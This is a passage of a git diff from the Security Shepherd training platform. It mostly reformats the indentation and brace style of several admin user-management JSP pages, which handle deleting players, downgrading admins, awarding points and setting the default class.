+						$("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
+					}
+					else
+					{
+						$("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
+					}
+					$("#playerSelect").show("slow");
+				});
+			}
+			else
+			{
+				$("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+			}
+		});
+		
+		$("#theForm").submit(function(){
+			//Get Data
+			var theCsrfToken = $('#csrfToken').val();
+			var thePlayers = $("#playerId").val();
+			//Validation
+			if (thePlayers == null)
+			{
+				$('#badData').html("<p><strong><font color='red'>Please select a player to delete.</font></strong></p>");
+			}
+			else
+			{
+				//Hide&Show Stuff
+				$("#loadingDiv").show("fast");
+				$("#badData").hide("fast");
+				$("#resultDiv").hide("fast");
+				$("#deletePlayerDiv").slideUp("fast", function(){
+					//The Ajax Operation
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "deletePlayers",
+						data: {
+							player: thePlayers,
+							csrfToken: theCsrfToken
+						},
+						async: false
+					});
+					$("#loadingDiv").hide("fast", function(){
+						if(ajaxCall.status == 200)
+						{
+							//Now output Result Div and Show
+							$("#resultDiv").html(ajaxCall.responseText);
+							$("#resultDiv").show("fast");
+							
+							var success_mark = "successfully";
+							
+							if (ajaxCall.responseText.indexOf(success_mark) > 0){
+								if ($("#playerId").length == 1){
+									var userSelect = $("#playerId")[0];
+									userSelect.remove(userSelect.selectedIndex);
+								}
+							}
+						}
+						else
+						{
+							$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+							$("#badData").show("slow");
+						}
+						$("#deletePlayerDiv").slideDown("slow");
+					});
+				});
+			}
+		});
+	</script>
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+	response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
 
 
diff --git a/src/main/webapp/admin/userManagement/downgradeAdmins.jsp b/src/main/webapp/admin/userManagement/downgradeAdmins.jsp
index cd225a1fe..6f56a2e6b 100644
--- a/src/main/webapp/admin/userManagement/downgradeAdmins.jsp
+++ b/src/main/webapp/admin/userManagement/downgradeAdmins.jsp
@@ -1,166 +1,188 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.DowngradeAdmin"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.DowngradeAdmin"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: downgradeAdmins.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: downgradeAdmins.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(downgradeAdmins.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(downgradeAdmins.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
 
 //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //This encoder should escape all output to prevent XSS attacks. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showAdmins = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showAdmins = false;
 
-            ResultSet classList = Getter.getAdmins(ApplicationRoot);
-            try {
-                showAdmins = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showAdmins = false;
-            }
+ResultSet classList = Getter.getAdmins(ApplicationRoot);
+try
+{
+	showAdmins = classList.next();
+}
+catch(SQLException e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showAdmins = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Downgrade Admin</h1>
-    <div id="downgradeDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Please select the admin that you would like to downgrade to
-                player</p>
-            <div id="badData"></div>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <table align="center">
-                <tr>
-                    <td>
-                        <p>Admins:</p>
-                    </td>
-                    <td><select id="selectClass">
-                        <option value="">Select admin...</option>
-                        <%
-                            if (showAdmins) {
-                                try {
-                                    do {
-                                        String adminId = Encode.forHtml(classList.getString(1));
-                                        String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                        %>
-                        <option value="<%=adminId%>"><%=classYearName%>
-                        </option>
-                        <%
-                                    }
-                                    while (classList.next());
-                                    classList.first();
-                                } catch (SQLException e) {
-                                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                    showAdmins = false;
-                                }
-                            }
-                        %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Downgrade Admin"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Downgrade Admin</h1>
+	<div id="downgradeDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Please select the admin that you would like to downgrade to
+				player</p>
+			<div id="badData"></div>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<table align="center">
+				<tr>
+					<td>
+						<p>Admins:</p>
+					</td>
+					<td><select id="selectClass">
+							<option value="">Select admin...</option>
+							<%
+									if(showAdmins)
+														{
+															try
+															{
+																do
+																{
+																	String adminId = Encode.forHtml(classList.getString(1));
+																	String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+								%>
+							<option value="<%=adminId%>"><%=classYearName%></option>
+							<%
+												}
+																			while(classList.next());
+																			classList.first();
+																		}
+																		catch(SQLException e)
+																		{
+																			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+																			showAdmins = false;
+																		}
+																	}
+											%>
+					</select></td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Downgrade Admin" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 <script>
-    $("#theForm").submit(function () {
-        //Get Data
-        var theCsrfToken = $('#csrfToken').val();
-        var adminToDowngrade = $("#selectClass option:selected").val();
-        //Validation
-        if (adminToDowngrade == null) {
-            $('#badData').html("<p><strong><font color='red'>Please select an admin to downgrade.</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#downgradeDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "downgradeAdmin",
-                    data: {
-                        admin: adminToDowngrade,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                        var success_mark = "successfully";
-
-                        if (ajaxCall.responseText.indexOf(success_mark) > 0) {
-                            if ($("#selectClass").length == 1) {
-                                var userSelect = $("#selectClass")[0];
-                                userSelect.remove(userSelect.selectedIndex);
-                            }
-                        }
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#downgradeDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#theForm").submit(function(){
+		//Get Data
+		var theCsrfToken = $('#csrfToken').val();
+		var adminToDowngrade = $("#selectClass option:selected").val();
+		//Validation
+		if (adminToDowngrade == null)
+		{
+			$('#badData').html("<p><strong><font color='red'>Please select an admin to downgrade.</font></strong></p>");
+		}
+		else
+		{
+			//Hide&Show Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#downgradeDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "downgradeAdmin",
+					data: {
+						admin: adminToDowngrade, 
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+						var success_mark = "successfully";
+						
+						if (ajaxCall.responseText.indexOf(success_mark) > 0){
+							if ($("#selectClass").length == 1){
+								var userSelect = $("#selectClass")[0];
+								userSelect.remove(userSelect.selectedIndex);
+							}
+						}
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					$("#downgradeDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/givePoints.jsp b/src/main/webapp/admin/userManagement/givePoints.jsp
index de85cf9e2..6a8ec259f 100644
--- a/src/main/webapp/admin/userManagement/givePoints.jsp
+++ b/src/main/webapp/admin/userManagement/givePoints.jsp
@@ -1,212 +1,241 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: givePoints.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: givePoints.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(givePoints.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(givePoints.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
 
 //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
 
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+	showClasses = classList.next();
+}
+catch(SQLException e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showClasses = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Reward / Deduct Points</h1>
-    <div class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Use this function to reward or punish your players. Use the
-                following form with a positive or negitive number to modify the
-                amount of points a player has. For the best results, ensure your
-                users can see the Shepherd Scoreboard. If you push a player into
-                negative points they will not appear on the scoreboard.</p>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <div id="updatePointsDiv">
-                <table align="center">
-                    <tr>
-                        <td colspan="2">
-                            <p>Pick the class of the player you wish to modify</p>
-                            <center>
-                                <select id="selectClass" style="width: 300px;">
-                                    <option value="">Unassigned Players</option>
-                                    <%
-                                        if (showClasses) {
-                                            try {
-                                                do {
-                                                    String classId = Encode.forHtml(classList.getString(1));
-                                                    String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                                    %>
-                                    <option value="<%=classId%>"><%=classYearName%>
-                                    </option>
-                                    <%
-                                                }
-                                                while (classList.next());
-                                                classList.first();
-                                            } catch (SQLException e) {
-                                                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                                showClasses = false;
-                                            }
-                                        }
-                                    %>
-                                </select>
-                            </center>
-                        </td>
-                    </tr>
-                    <tr>
-                        <td colspan="2">
-                            <p>Select the player that you want to give/take points from</p>
-                            <div id="playerSelect">
-                                <center>
-                                    <select id='playerId' style='width: 300px;'>
-                                        <%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
-                                    </select>
-                                </center>
-                            </div>
-                            <br>
-                        </td>
-                    </tr>
-                    <tr>
-                        <td>Number of Points:</td>
-                        <td><input type="input" style='width: 200px'
-                                   id="numberOfPoints"/><br></td>
-                    </tr>
-                    <tr>
-                        <td colspan="2" align="center"><input type="submit"
-                                                              id="submitButton" value="Update Player Points"/></td>
-                    </tr>
-                </table>
-            </div>
-            <br>
-            <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-            <div id="resultDiv" style="display: none;" class="informationBox"></div>
-            <div id="badData"></div>
-        </form>
-    </div>
+	<h1 class="title">Reward / Deduct Points</h1>
+	<div class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Use this function to reward or punish your players. Use the
+				following form with a positive or negitive number to modify the
+				amount of points a player has. For the best results, ensure your
+				users can see the Shepherd Scoreboard. If you push a player into
+				negative points they will not appear on the scoreboard.</p>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<div id="updatePointsDiv">
+				<table align="center">
+					<tr>
+						<td colspan="2">
+							<p>Pick the class of the player you wish to modify</p>
+							<center>
+								<select id="selectClass" style="width: 300px;">
+									<option value="">Unassigned Players</option>
+									<%
+										if(showClasses)
+										{
+											try
+											{
+												do
+												{
+													String classId = Encode.forHtml(classList.getString(1));
+													String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+													%>
+									<option value="<%=classId%>"><%=classYearName%></option>
+									<%
+												}
+												while(classList.next());
+												classList.first();
+											}
+											catch(SQLException e)
+											{
+												ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+												showClasses = false;
+											}
+										}
+												%>
+								</select>
+							</center>
+						</td>
+					</tr>
+					<tr>
+						<td colspan="2">
+							<p>Select the player that you want to give/take points from</p>
+							<div id="playerSelect">
+								<center>
+									<select id='playerId' style='width: 300px;'>
+										<%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
+									</select>
+								</center>
+							</div> <br>
+						</td>
+					</tr>
+					<tr>
+						<td>Number of Points:</td>
+						<td><input type="input" style='width: 200px'
+							id="numberOfPoints" /><br></td>
+					</tr>
+					<tr>
+						<td colspan="2" align="center"><input type="submit"
+							id="submitButton" value="Update Player Points" /></td>
+					</tr>
+				</table>
+			</div>
+			<br>
+			<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+			<div id="resultDiv" style="display: none;" class="informationBox"></div>
+			<div id="badData"></div>
+		</form>
+	</div>
 </div>
 <script>
-    $("#selectClass").change(function () {
-        var theCsrfToken = $('#csrfToken').val();
-        var ajaxCall = $.ajax({
-            type: "POST",
-            url: "getPlayersByClass",
-            data: {
-                classId: $("#selectClass option:selected").val(),
-                csrfToken: theCsrfToken
-            },
-            async: false
-        });
-        if (ajaxCall.status == 200) {
-            $("#playerSelect").hide("fast", function () {
-                if (ajaxCall.responseText == '') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
-                } else if (ajaxCall.responseText == 'fail') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
-                } else {
-                    $("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
-                }
-                $("#playerSelect").show("slow");
-            });
-        } else {
-            $("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-        }
-    });
-
-    $("#theForm").submit(function () {
-        //Get Data
-        var theCsrfToken = $('#csrfToken').val();
-        var theNumberOfPoints = $('#numberOfPoints').val();
-        var thePlayers = $("#playerId").val();
-        //Validation
-        if (thePlayers == null) {
-            $('#badData').html("<p><strong><font color='red'>Please select a player to suspend.</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#updatePointsDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "giveTakePoints",
-                    data: {
-                        player: thePlayers,
-                        numberOfPoints: theNumberOfPoints,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#updatePointsDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#selectClass").change(function () {
+		var theCsrfToken = $('#csrfToken').val();
+		var ajaxCall = $.ajax({
+			type: "POST",
+			url: "getPlayersByClass",
+			data: {
+				classId: $("#selectClass option:selected").val(),
+				csrfToken: theCsrfToken
+			},
+			async: false
+		});
+		if(ajaxCall.status == 200)
+		{
+			$("#playerSelect").hide("fast", function(){
+				if(ajaxCall.responseText == '')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
+				}
+				else if(ajaxCall.responseText == 'fail')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
+				}
+				else
+				{
+					$("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
+				}
+				$("#playerSelect").show("slow");
+			});
+		}
+		else
+		{
+			$("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+		}
+	});
+	
+	$("#theForm").submit(function(){
+		//Get Data
+		var theCsrfToken = $('#csrfToken').val();
+		var theNumberOfPoints = $('#numberOfPoints').val();
+		var thePlayers = $("#playerId").val();
+		//Validation
+		if (thePlayers == null)
+		{
+			$('#badData').html("<p><strong><font color='red'>Please select a player to suspend.</font></strong></p>");
+		}
+		else
+		{
+			//Hide&Show Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#updatePointsDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "giveTakePoints",
+					data: {
+						player: thePlayers,
+						numberOfPoints: theNumberOfPoints,
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					$("#updatePointsDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/setDefaultClassForRegistration.jsp b/src/main/webapp/admin/userManagement/setDefaultClassForRegistration.jsp
index 135c75420..a9baef050 100644
--- a/src/main/webapp/admin/userManagement/setDefaultClassForRegistration.jsp
+++ b/src/main/webapp/admin/userManagement/setDefaultClassForRegistration.jsp
@@ -1,159 +1,181 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setDefaultClassForRegistration.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setDefaultClassForRegistration.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setDefaultClassForRegistration.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setDefaultClassForRegistration.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
